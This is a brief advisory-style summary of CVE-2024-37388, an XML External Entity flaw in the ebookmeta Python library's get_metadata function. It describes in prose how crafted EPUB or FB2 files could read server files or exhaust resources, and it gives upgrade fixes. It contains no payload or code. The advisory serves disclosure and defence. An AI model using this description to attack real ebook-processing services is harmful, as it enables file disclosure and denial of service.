CVE-2024-37388

Vulnerability

Overview

CVE-2024-37388 is an XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of the ebookmeta Python library. The root cause is that the library uses lxml's XML parser without disabling external entity processing. When lxml is prior to version 4.9.1, the parser will resolve external entities defined in the XML input, leading to XXE [1][3].

Exploitation

An attacker can exploit this vulnerability by providing a specially crafted ebook file (e.g., an EPUB or FB2 file) that contains malicious XML with external entity references. The victim must process this file using the get_metadata function. No authentication is required beyond the ability to supply the file; the attack can be triggered locally or remotely if the application accepts user-uploaded ebook files [2][3].

Impact

Successful exploitation allows an attacker to read arbitrary files from the server's filesystem (information disclosure) or cause a denial of service (DoS) by including entities that consume excessive resources, such as through entity expansion or external resource requests [1][3].

Mitigation

The vulnerability is fixed by updating lxml to version 4.9.1 or later, which disables external entity resolution by default. Additionally, ebookmeta version 1.2.8 and later includes a fix that ensures safe XML parsing. Users should upgrade both libraries to the latest versions. No workarounds are documented [2][3].